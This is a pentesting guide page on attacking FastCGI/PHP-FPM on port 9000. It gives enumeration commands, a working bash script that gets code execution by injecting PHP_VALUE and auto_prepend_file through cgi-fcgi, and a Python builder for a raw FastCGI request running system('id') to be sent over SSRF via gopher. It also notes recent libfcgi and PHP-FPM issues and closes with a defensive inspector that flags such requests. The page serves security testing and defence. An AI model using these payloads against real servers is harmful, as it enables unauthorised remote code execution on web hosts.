9000 Pentesting FastCGI

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

If you want to learn what FastCGI is, check the following page:

disable_functions bypass - php-fpm/FastCGI

By default FastCGI runs on port 9000 and is not recognised by nmap. Usually FastCGI only listens on localhost.

Enumeration / Quick checks

  • Port scan: nmap -sV -p9000 <target> (it will often report the service as “unknown”; probe it manually).
  • Probe the FPM status page: SCRIPT_FILENAME=/status SCRIPT_NAME=/status REQUEST_METHOD=GET cgi-fcgi -bind -connect 127.0.0.1:9000 (the default php-fpm pm.status_path).
  • Find reachable sockets via SSRF: if an HTTP service can be abused for SSRF, try gopher://127.0.0.1:9000/_... payloads to reach the FastCGI listener.
  • Nginx misconfigs: cgi.fix_pathinfo=1 combined with a wrong fastcgi_split_path_info lets you append /.php to static files and reach PHP (code execution via traversal).

RCE

It is very easy to make FastCGI execute arbitrary code:

<details>
<summary>Send a FastCGI request that prepends a PHP payload</summary>

```bash
#!/bin/bash

PAYLOAD="<?php echo '';"
FILENAMES="/var/www/public/index.php" # Existing file path

HOST=$1
B64=$(echo "$PAYLOAD" | base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    # Inject php.ini directives through PHP_VALUE so the base64 payload is auto-prepended to the script
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect "$HOST:9000" &> "$OUTPUT"

    cat "$OUTPUT"
done
```

</details>

or you can also use the following python script: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75)

### SSRF/gopher to FastCGI (when 9000 is not directly reachable)

If you only control an **SSRF** primitive, you can still reach FastCGI through the gopher scheme by building a complete FastCGI request yourself. Example payload builder:

<details>
<summary>Build and send a gopher FastCGI RCE payload</summary>

```python
import struct, socket

host, port = "127.0.0.1", 9000
body = b"<?php system('id'); ?>"
params = {
    b"REQUEST_METHOD": b"POST",
    b"SCRIPT_FILENAME": b"/var/www/html/index.php",
    b"CONTENT_LENGTH": str(len(body)).encode(),  # php://input only reads this many bytes of stdin
    b"PHP_VALUE": b"auto_prepend_file=php://input\nallow_url_include=1",
}

def rec(rec_type, content, req_id=1):
    # FastCGI record header: version 1, type, request id, content length, padding 0, reserved 0
    return struct.pack("!BBHHBB", 1, rec_type, req_id, len(content), 0, 0) + content

def enc_params(d):
    # Single-byte lengths only: every name and value must be shorter than 128 bytes
    out = b""
    for k, v in d.items():
        out += struct.pack("!B", len(k)) + struct.pack("!B", len(v)) + k + v
    return out

payload  = rec(1, struct.pack("!HB5x", 1, 0))         # FCGI_BEGIN_REQUEST: role RESPONDER, flags 0
payload += rec(4, enc_params(params)) + rec(4, b"")  # FCGI_PARAMS + terminator
payload += rec(5, body) + rec(5, b"")                 # FCGI_STDIN + terminator

s = socket.create_connection((host, port))
s.sendall(payload)
print(s.recv(4096))
```

</details>

Convert the payload to URL-safe base64/percent-encoding and send it through gopher://host:9000/_<payload> in your SSRF.

Notes on recent issues

  • libfcgi <= 2.4.4 integer overflow (2024): crafted nameLen/valueLen values in FastCGI records can overflow on 32-bit builds (common in embedded/IoT), leading to heap RCE whenever the FastCGI socket is reachable (directly or via SSRF).
  • PHP-FPM log manipulation (CVE-2024-9026): when catch_workers_output = yes, attackers able to send FastCGI requests can truncate or inject up to 4 bytes per log line, erasing indicators or corrupting the logs.
  • Classic Nginx + cgi.fix_pathinfo misconfig: still very common; if fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; is used without checking that the file exists, any path ending in .php is executed, enabling path traversal or source-overwrite style gadgets.
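As an added defensive example (not code from the original page or from phith0n's gist), the following Python inspector walks the records of a FastCGI request as seen on a socket or in a capture, decodes the FCGI_PARAMS name/value pairs, and flags the two things this page describes as dangerous: declared nameLen/valueLen that cannot fit in the record (the input the libfcgi <= 2.4.4 overflow needs) and PHP_VALUE/PHP_ADMIN_VALUE pairs that push auto_prepend_file or allow_url_include. The sample requests are constructed inline; the finding names and the SUSPICIOUS_INI list are my own choices.

```python
import struct
FCGI_PARAMS = 4
# php.ini directives the PHP_VALUE / auto_prepend_file technique above relies on (my own list)
SUSPICIOUS_INI = (b"auto_prepend_file", b"auto_append_file", b"allow_url_include")

def read_len(buf, pos):
    # name/value length: 1 byte if < 128, otherwise 4 bytes with the high bit set
    if buf[pos] < 0x80:
        return buf[pos], pos + 1
    return struct.unpack("!I", buf[pos:pos + 4])[0] & 0x7FFFFFFF, pos + 4

def enc_len(n):
    return bytes([n]) if n < 0x80 else struct.pack("!I", n | 0x80000000)

def record(rtype, content, req_id=1):
    return struct.pack("!BBHHBB", 1, rtype, req_id, len(content), 0, 0) + content

def encode_params(d):
    return b"".join(enc_len(len(k)) + enc_len(len(v)) + k + v for k, v in d.items())

def inspect_fcgi_stream(data):
    findings, pos = [], 0
    while pos + 8 <= len(data):
        _ver, rtype, _rid, clen, plen, _ = struct.unpack("!BBHHBB", data[pos:pos + 8])
        content, pos = data[pos + 8:pos + 8 + clen], pos + 8 + clen + plen
        if rtype != FCGI_PARAMS or not content:
            continue
        p = 0
        try:
            while p < len(content):
                name_len, p = read_len(content, p)
                value_len, p = read_len(content, p)
                # a record body is at most 65535 bytes, so declared lengths that exceed the
                # remaining content are never legitimate (the libfcgi <= 2.4.4 overflow input)
                if name_len + value_len > len(content) - p:
                    findings.append(("oversized-length", (name_len, value_len)))
                    break
                name, p = content[p:p + name_len], p + name_len
                value, p = content[p:p + value_len], p + value_len
                if name in (b"PHP_VALUE", b"PHP_ADMIN_VALUE"):
                    hits = [d.decode() for d in SUSPICIOUS_INI if d in value]
                    if hits:
                        findings.append(("php-ini-injection", (name.decode(), hits)))
        except (IndexError, struct.error):
            findings.append(("truncated-record", p))
    return findings

# constructed sample requests (not captured traffic): clean, ini injection, and a 2 GiB length claim
BENIGN = record(4, encode_params({b"REQUEST_METHOD": b"GET", b"SCRIPT_FILENAME": b"/var/www/html/index.php"}))
INJECTED = record(4, encode_params({b"PHP_VALUE": b"auto_prepend_file=php://input\nallow_url_include=1"}))
OVERSIZED = record(4, enc_len(3) + enc_len(0x7FFFFFFF) + b"FOOx")
```

Run inspect_fcgi_stream over the bytes of each request hitting the FPM socket; any finding is worth an alert, since a legitimate web server never sends these.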
